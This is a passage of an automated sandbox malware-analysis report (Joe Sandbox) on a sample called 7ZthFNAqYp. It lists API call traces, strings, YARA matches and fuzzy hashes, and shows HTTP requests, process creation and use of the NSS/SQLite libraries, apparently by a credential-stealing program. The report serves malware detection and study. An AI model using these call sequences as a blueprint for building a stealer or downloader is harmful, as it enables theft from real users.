                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00930CC0
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF031B1900218BBDB10ABE59C05ABF77FCAF0C715F400085F955E7180DA38DA80D775
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00934FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00934FEC,?), ref: 00932156
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00934FEC,?,?,?,00934FEC,?), ref: 0093216E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934FEC,?), ref: 00932179
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934FEC,?), ref: 00932181
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4148174661-0
                                                                                                                                                                                                              • Opcode ID: 2964bd65761524b55ca10631322483627337099a10e029b802f1ef439bc512f5
                                                                                                                                                                                                              • Instruction ID: b4db8d0aba3573cb2c5b9a51b426aea85f1c7012eead91391f0381dbb8434519
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2964bd65761524b55ca10631322483627337099a10e029b802f1ef439bc512f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF01231605215BBE7149BA0DD49FDA7A6CDF09760F104250FE15AA1D0DB70AE818A95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                                                                                              • Opcode ID: c392e237adc19b5928328e4846047655549fb5d6b1cd5d94341316af68608780
                                                                                                                                                                                                              • Instruction ID: f6840f5ac102d949721e16b17249b3131859775b626908673ce2c93a58f36ef6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c392e237adc19b5928328e4846047655549fb5d6b1cd5d94341316af68608780
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E030767006089BCA10EFA9DC8588677BCFE492703150525F691C3700D231F915CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_value_text.NSS3 ref: 6CAB9E1F
                                                                                                                                                                                                                • Part of subcall function 6CA713C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA42352,?,00000000,?,?), ref: 6CA71413
                                                                                                                                                                                                                • Part of subcall function 6CA713C0: memcpy.VCRUNTIME140(00000000,6CA42352,00000002,?,?,?,?,6CA42352,?,00000000,?,?), ref: 6CA714C0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • LIKE or GLOB pattern too complex, xrefs: 6CABA006
                                                                                                                                                                                                              • ESCAPE expression must be a single character, xrefs: 6CAB9F78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                              • API String ID: 2453365862-264706735
                                                                                                                                                                                                              • Opcode ID: cd5852114157514f83a0a278b815f8d3b387c0c39f74943021d7446abd72e11a
                                                                                                                                                                                                              • Instruction ID: dde3673dd2d8e80272cec7ae67a09fcfcb3006e15f2d4779000090e38332fcba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd5852114157514f83a0a278b815f8d3b387c0c39f74943021d7446abd72e11a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29813D30A043514BD700CF39C2903ADB7F6AF55328F2C8659D8A9ABB81D732D8C6C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00925237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092527E
                                                                                                                                                                                                                • Part of subcall function 00925237: RtlAllocateHeap.NTDLL(00000000), ref: 00925285
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 009252A7
                                                                                                                                                                                                                • Part of subcall function 00925237: StrCmpCA.SHLWAPI(?), ref: 009252C1
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009252F1
                                                                                                                                                                                                                • Part of subcall function 00925237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00925330
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925360
                                                                                                                                                                                                                • Part of subcall function 00925237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0092536B
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00932D1F
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00956718), ref: 00932D71
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                              • API String ID: 2831197775-4119554291
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB14D57
                                                                                                                                                                                                              • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CB14DE6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorR_snprintf
                                                                                                                                                                                                              • String ID: %d.%d
                                                                                                                                                                                                              • API String ID: 2298970422-3954714993
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                              • API String ID: 256744135-2556327735
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                              • API String ID: 2803490479-3785015651
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F113
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                                • Part of subcall function 0092F20D: std::_Xinvalid_argument.LIBCPMT ref: 0092F217
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0092F165
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 0092F10E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 3404309857-1799206989
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F331
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                              • memmove.MSVCRT(0092EE93,0092EE93,C6C68B00,0092EE93,0092EE93,0092F134,?,?,?,0092F1B4,?,?,?,76230440,?,-00000001), ref: 0092F367
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 0092F32C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 1659287814-1799206989
                                                                                                                                                                                                              • Opcode ID: fe4ca43606872a12132111a588ddf0e5d88e91c658a98685f08743bb685d0de5
                                                                                                                                                                                                              • Instruction ID: 5a0d040a1887b87c7e0f700b311361e48c2d80d00b192cf0c3e4ac6ec9b07039
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe4ca43606872a12132111a588ddf0e5d88e91c658a98685f08743bb685d0de5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F501D6313002228BD724CE78A8E491EB2F6EBC87417240D3CD492C7349D778EC4A9BD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameName::
                                                                                                                                                                                                              • String ID: {flat}
                                                                                                                                                                                                              • API String ID: 1333004437-2606204563
                                                                                                                                                                                                              • Opcode ID: c84b202e0cb020dd61246381fa331a8ff4f519e8190991c0fb94707f5bbf20a6
                                                                                                                                                                                                              • Instruction ID: 3d4d2b7b43df4087d5f15611ea4c313bbda54917526b19ce88bc98b9c2649bd7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c84b202e0cb020dd61246381fa331a8ff4f519e8190991c0fb94707f5bbf20a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0E5326442089FCB00DF68D425BB43BB4AF86755F08C040F84C0F2A2C731D841CF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 587104284-2766056989
                                                                                                                                                                                                              • Opcode ID: 4c7313ec3c8647598b66d9dd55d03596ce23e8cb32b3e4007a6d30faa291cd78
                                                                                                                                                                                                              • Instruction ID: 62fff0b9f8ce0b66cfa9b5b8821b83f889f171c9330eccf88ae0ea9f1e519879
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c7313ec3c8647598b66d9dd55d03596ce23e8cb32b3e4007a6d30faa291cd78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10E04FF0D112089BEB00EFB4E906F4DB3B8AB48304F500025AA05E72C1E674BA098B55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$calloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3339632435-0
                                                                                                                                                                                                              • Opcode ID: e10eea3cd0a3b16755c973e6ea19393bc5aff4b6db0cf9e2c1553e7f60600417
                                                                                                                                                                                                              • Instruction ID: caf11561d4c6204d363bdaa15a1490f36fc4c26f07aeda9aa260b2c1114513ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10eea3cd0a3b16755c973e6ea19393bc5aff4b6db0cf9e2c1553e7f60600417
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A83180B0A547C5CBEB00BF38A5A56697BB8FF09308F114669D89C87A11DB38D4C5CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: b2149cb2aa788b79a660252fe8a9d0e973c71b999f00e9cc19a2c5504eb64004
                                                                                                                                                                                                              • Instruction ID: 51645d710ed733c8a64f9d507a07cde6dbbcee4e0268c3a996acf474179cae2f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2149cb2aa788b79a660252fe8a9d0e973c71b999f00e9cc19a2c5504eb64004
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F0B4B17401026BEB009B66DC45E3773BCFF455A4B090435ED19C3A00DB25F49086A2